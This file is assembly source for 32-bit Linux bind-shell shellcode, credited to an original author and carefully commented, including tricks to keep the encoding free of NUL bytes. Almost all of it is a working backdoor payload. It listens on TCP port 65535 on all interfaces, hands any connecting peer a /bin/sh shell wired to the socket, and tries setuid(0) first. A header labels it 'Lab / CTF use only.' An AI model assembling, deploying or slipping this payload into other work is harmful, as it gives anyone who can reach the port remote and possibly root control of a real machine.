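/*
 * Linux/x86 (32-bit, int $0x80 ABI) bind-shell shellcode, GAS AT&T syntax.
 *
 *   sockfd = socket(AF_INET, SOCK_STREAM, 0)          socketcall subcall 1
 *   bind(sockfd, {AF_INET, 65535, INADDR_ANY}, 16)    socketcall subcall 2
 *   listen(sockfd, 10)                                socketcall subcall 4
 *   client = accept(sockfd, &addr, &addrlen)          socketcall subcall 5
 *   write(client, "<shell>", 7)
 *   dup2(client, 2); dup2(client, 1); dup2(client, 0)
 *   setuid(0)
 *   execve("/bin/sh", {"/bin/sh", NULL}, NULL)
 *
 * SECURITY: this is an unauthenticated backdoor. Anyone who can reach TCP
 * port 65535 on any interface (the bind address is INADDR_ANY, 0.0.0.0)
 * gets a shell with the privileges of the process it runs in, root if the
 * setuid(0) call succeeds. Lab / CTF use only. The "<shell>" banner is a
 * trivial network indicator of compromise.
 *
 * Register roles:
 *   %esi = 0 throughout the socket setup (zero source for struct fields)
 *   %edi = listening socket fd
 *   %ebp = &sockaddr_in, reused as the peer-address buffer for accept()
 *   %ebx = client fd after accept(); syscall arg 1
 *
 * Notes:
 *   - every 16/32-bit field (sin_family, socketcall args, addrlen, backlog)
 *     is written at its full width via pushes; writing only the low byte
 *     into freshly reserved stack leaves the upper bytes as stack garbage.
 *   - structures are kept live on the stack (no add $N,%esp after use), so
 *     the sockaddr passed to accept() is never below %esp.
 *   - the encoding is meant to stay NUL-free (movb into a zeroed register,
 *     imm8 pushes, 0xff string fillers overwritten at run time); verify
 *     with objdump after assembling.
 *   - no syscall return value is checked; on failure execution falls
 *     through to the next call, as in the original.
 *
 * Original author: beck <beck@math.co.ro>
 */

        .equ    SYS_write,      4
        .equ    SYS_execve,     11
        .equ    SYS_setuid,     23
        .equ    SYS_dup2,       63
        .equ    SYS_socketcall, 102

        .equ    SOCK_socket,    1       /* socketcall subcall numbers */
        .equ    SOCK_bind,      2
        .equ    SOCK_listen,    4
        .equ    SOCK_accept,    5

        .equ    AF_INET,        2
        .equ    SOCK_STREAM,    1
        .equ    BIND_PORT_BE,   0xffff  /* htons(65535); byte order is moot for 0xffff */
        .equ    BACKLOG,        10
        .equ    SOCKADDR_LEN,   16      /* sizeof(struct sockaddr_in) */

        .globl  main
main:
        xorl    %eax, %eax
        xorl    %ebx, %ebx
        xorl    %edx, %edx
        xorl    %esi, %esi              /* %esi stays 0 during socket setup */

/* sockfd = socket(AF_INET, SOCK_STREAM, 0) */
        pushl   %esi                    /* protocol = 0 */
        pushl   $SOCK_STREAM            /* type */
        pushl   $AF_INET                /* domain */
        movl    %esp, %ecx              /* %ecx = args[] for socketcall */
        movb    $SOCK_socket, %bl       /* %ebx upper bytes are zero from entry */
        movb    $SYS_socketcall, %al
        int     $0x80
        movl    %eax, %edi              /* %edi = listening socket */

/* struct sockaddr_in addr = { AF_INET, htons(65535), INADDR_ANY, {0} } */
        pushl   %esi                    /* sin_zero[4..7] */
        pushl   %esi                    /* sin_zero[0..3] */
        pushl   %esi                    /* sin_addr = INADDR_ANY (0.0.0.0) */
        pushw   $BIND_PORT_BE           /* sin_port, 16-bit field */
        pushw   $AF_INET                /* sin_family, 16-bit field */
        movl    %esp, %ebp              /* %ebp = &addr */

/* bind(sockfd, &addr, sizeof addr) */
        pushl   $SOCKADDR_LEN
        pushl   %ebp
        pushl   %edi
        movl    %esp, %ecx
        xorl    %eax, %eax
        movb    $SOCK_bind, %bl
        movb    $SYS_socketcall, %al
        int     $0x80

/* listen(sockfd, BACKLOG) */
        pushl   $BACKLOG
        pushl   %edi
        movl    %esp, %ecx
        xorl    %eax, %eax
        movb    $SOCK_listen, %bl
        movb    $SYS_socketcall, %al
        int     $0x80

/* client = accept(sockfd, &addr, &addrlen) -- blocks until a peer connects */
        pushl   $SOCKADDR_LEN           /* socklen_t addrlen = 16 */
        movl    %esp, %edx              /* %edx = &addrlen */
        pushl   %edx
        pushl   %ebp                    /* peer address is written over addr */
        pushl   %edi
        movl    %esp, %ecx
        xorl    %eax, %eax
        movb    $SOCK_accept, %bl
        movb    $SYS_socketcall, %al
        int     $0x80
        movl    %eax, %ebx              /* %ebx = client fd */

/* write(client, "<shell>", 7) */
        pushl   $0xff3e6c6c             /* "ll>\xff" -- 0xff filler avoids a NUL in the code */
        pushl   $0x6568733c             /* "<she" */
        xorl    %eax, %eax
        movb    %al, 7(%esp)            /* replace the filler with the terminating NUL */
        movl    %esp, %ecx              /* %ecx = "<shell>" */
        xorl    %edx, %edx
        movb    $7, %dl                 /* banner length, terminator not sent */
        movb    $SYS_write, %al
        int     $0x80

/* dup2(client, fd) for fd = 2, 1, 0 -- wires the shell's stdio to the socket */
        xorl    %ecx, %ecx
        movb    $2, %cl
.Ldup:
        xorl    %eax, %eax
        movb    $SYS_dup2, %al
        int     $0x80
        decl    %ecx
        jns     .Ldup                   /* falls out after fd 0 (ecx becomes -1) */

/* setuid(0) -- only effective if the process is already root or setuid-root */
        xorl    %eax, %eax
        xorl    %ebx, %ebx
        movb    $SYS_setuid, %al
        int     $0x80

/* execve("/bin/sh", {"/bin/sh", NULL}, NULL) */
        pushl   $0xff68732f             /* "/sh\xff" -- filler overwritten below */
        pushl   $0x6e69622f             /* "/bin" */
        xorl    %eax, %eax
        movb    %al, 7(%esp)            /* terminate "/bin/sh" */
        movl    %esp, %ebx              /* %ebx = path */
        pushl   %eax                    /* argv[1] = NULL */
        pushl   %ebx                    /* argv[0] = path */
        movl    %esp, %ecx              /* %ecx = argv */
        movl    %eax, %edx              /* %edx = envp = NULL */
        movb    $SYS_execve, %al
        int     $0x80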